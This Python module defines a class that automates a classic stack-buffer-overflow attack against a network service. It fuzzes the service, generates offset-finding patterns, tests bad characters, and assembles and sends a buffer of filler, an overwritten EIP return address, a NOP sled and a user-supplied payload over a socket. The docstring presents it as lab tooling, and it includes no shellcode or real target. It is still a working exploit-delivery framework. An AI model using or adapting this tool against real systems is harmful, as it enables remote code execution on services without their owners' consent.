from __future__ import annotations

import warnings
from typing import Callable

from . import constants
from . import fuzzer
from . import generator
from . import sender
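# Constants
# Stand-in for the EIP field until a real return address is configured;
# generateExploit() warns when it is still in use.
PLACEHOLDER_EIP = "BBBB"


class Buff:
    """Assemble the buffer layouts used in a classic stack-overflow lab.

    Every generated buffer leaves the object as ``prefix + body + postfix``;
    the body is padded with ``"A"`` up to ``buffer_size`` when it is shorter
    (a body that is already longer is never truncated). Delivery is delegated
    to ``self.sender`` (``sender.send_socket`` by default) and fuzzing to
    ``self.fuzzer`` (``fuzzer.fuzz`` by default); both can be replaced with
    ``setSender`` / ``setFuzzer``.
    """

    def __init__(self, target: tuple[str, int], prefix: str = "", postfix: str = ""):
        """
        Args:
            target: ``(str, int)`` pair handed verbatim to the sender and the
                fuzzer — presumably ``(host, port)``; see ``sender.send_socket``.
            prefix: text placed before every generated body.
            postfix: text placed after every generated body.
        """
        # Pluggable delivery and fuzzing callables
        self.sender = sender.send_socket
        self.fuzzer = fuzzer.fuzz
        # Target
        self.target = target
        # Bad-character set (per the project constant; default is bytes 1..255)
        self.bad_chars = constants.BAD_CHARS
        # Prefix and postfix wrapped around every body
        self.prefix = prefix
        self.postfix = postfix
        # Total buffer size the generators pad up to; must be set before generating
        self.buffer_size: int | None = None
        # Number of filler bytes before the EIP field, and the field's contents
        self.eip_offset: int | None = None
        self.eip_address = PLACEHOLDER_EIP
        # NOP sled inserted after the EIP field by generateExploit()
        self.padding = ""
        # Payload inserted after the NOP sled by generateExploit()
        self.exploit: str | None = None

    # --- Set Exploiters ---
    def setSender(self, method: Callable) -> None:
        """Replace the delivery callable; it is called as ``method(target, buffer)``."""
        self.sender = method

    def setFuzzer(self, method: Callable) -> None:
        """Replace the fuzzing callable; see ``fuzz`` for the call signature."""
        self.fuzzer = method

    # --- Exploit Configuration ---
    def setPrefix(self, prefix: str) -> None:
        self.prefix = prefix

    def setPostfix(self, postfix: str) -> None:
        self.postfix = postfix

    def setBufferSize(self, buffer_size: int) -> None:
        """Set the size the generators pad up to.

        Raises:
            ValueError: if *buffer_size* is not positive.
        """
        if buffer_size <= 0:
            raise ValueError("Buffer size must be greater than 0")
        self.buffer_size = buffer_size

    def setEipAddress(self, eip: str) -> None:
        """Set the 4-character EIP field.

        Raises:
            ValueError: if *eip* is not exactly 4 characters long.
        """
        if len(eip) != 4:
            raise ValueError("EIP address length must be exactly 4")
        self.eip_address = eip

    def setEipOffset(self, offset: int) -> None:
        """Set the number of filler bytes placed before the EIP field.

        Raises:
            ValueError: if *offset* is negative.
        """
        if offset < 0:
            raise ValueError("EIP offset cannot be negative")
        self.eip_offset = offset

    def setPaddingSize(self, length: int) -> None:
        """Set the NOP sled to *length* ``\\x90`` characters.

        Raises:
            ValueError: if *length* is negative (would silently yield an empty sled).
        """
        if length < 0:
            raise ValueError("Padding length cannot be negative")
        self.padding = "\x90" * length

    def setExploit(self, exploit: str) -> None:
        self.exploit = exploit

    # --- Internal checks and assembly ---
    def _require_eip_offset(self) -> int:
        """Return ``eip_offset`` or raise ``ValueError`` if it was never set."""
        if self.eip_offset is None:
            raise ValueError("EIP offset is not set")
        return self.eip_offset

    def _require_buffer_size(self) -> int:
        """Return ``buffer_size`` or raise ``ValueError`` if it was never set."""
        if self.buffer_size is None:
            raise ValueError("Buffer size is not set")
        return self.buffer_size

    def _finalize(self, body: str) -> str:
        """Pad *body* with ``"A"`` up to ``buffer_size`` and wrap it in prefix/postfix.

        A body longer than ``buffer_size`` is returned unpadded and untruncated,
        matching the original behaviour; callers see the full length via ``len``.
        """
        size = self._require_buffer_size()
        if len(body) < size:
            body += "A" * (size - len(body))
        return self.prefix + body + self.postfix

    # --- Fuzzer ---
    def fuzz(self, timeout: int = 5, step_size: int = 100, sleep: int = 1) -> None:
        """Run the configured fuzzer as ``fuzzer(target, timeout, prefix, postfix, step_size, sleep)``."""
        self.fuzzer(self.target, timeout, self.prefix, self.postfix, step_size, sleep)

    # --- Generic Sender ---
    def send(self, buffer: str) -> None:
        """Send ``prefix + buffer + postfix`` through the configured sender."""
        self.sender(self.target, self.prefix + buffer + self.postfix)

    # --- Send Pattern ---
    def generatePattern(self) -> str:
        """
        PREFIX + PATTERN + POSTFIX

        The pattern comes from ``generator.generatePattern(buffer_size)`` and is
        not padded.

        Raises:
            ValueError: if ``buffer_size`` is not set.
        """
        size = self._require_buffer_size()
        return self.prefix + generator.generatePattern(size) + self.postfix

    def sendPattern(self) -> None:
        self.sender(self.target, self.generatePattern())

    # --- Bad Character Exploit ---
    def generateBadChars(self, exclude: list[str] | None = None, fake_eip: str = PLACEHOLDER_EIP) -> str:
        """
        PREFIX + FILLER + EIP + BAD CHARACTERS + POSTFIX

        Args:
            exclude: substrings removed from ``bad_chars`` before assembly
                (each entry is removed with ``str.replace``).
            fake_eip: value written into the EIP field; defaults to the placeholder.

        Raises:
            ValueError: if ``eip_offset`` or ``buffer_size`` is not set.
        """
        offset = self._require_eip_offset()
        self._require_buffer_size()
        bad_chars = self.bad_chars
        for ex in exclude or []:
            bad_chars = bad_chars.replace(ex, "")
        body = "A" * offset + fake_eip + bad_chars
        return self._finalize(body)

    def sendBadChars(self, exclude: list[str] | None = None, fake_eip: str = PLACEHOLDER_EIP) -> None:
        self.sender(self.target, self.generateBadChars(exclude, fake_eip))

    # --- Real Exploit ---
    def generateExploit(self) -> str:
        """
        PREFIX + FILLER + EIP + PADDING + EXPLOIT + POSTFIX

        Emits a ``UserWarning`` when ``eip_address`` is still the placeholder.

        Raises:
            ValueError: if ``eip_offset``, ``buffer_size`` or ``exploit`` is not set.
        """
        offset = self._require_eip_offset()
        if self.eip_address == PLACEHOLDER_EIP:
            warnings.warn(
                f"your EIP is a placeholder, {self.eip_address}. "
                "Are you sure you have set the correct return address",
                stacklevel=2,
            )
        self._require_buffer_size()
        if self.exploit is None:
            raise ValueError("Exploit is not set")
        body = "A" * offset + self.eip_address + self.padding + self.exploit
        return self._finalize(body)

    def sendExploit(self) -> None:
        self.sender(self.target, self.generateExploit())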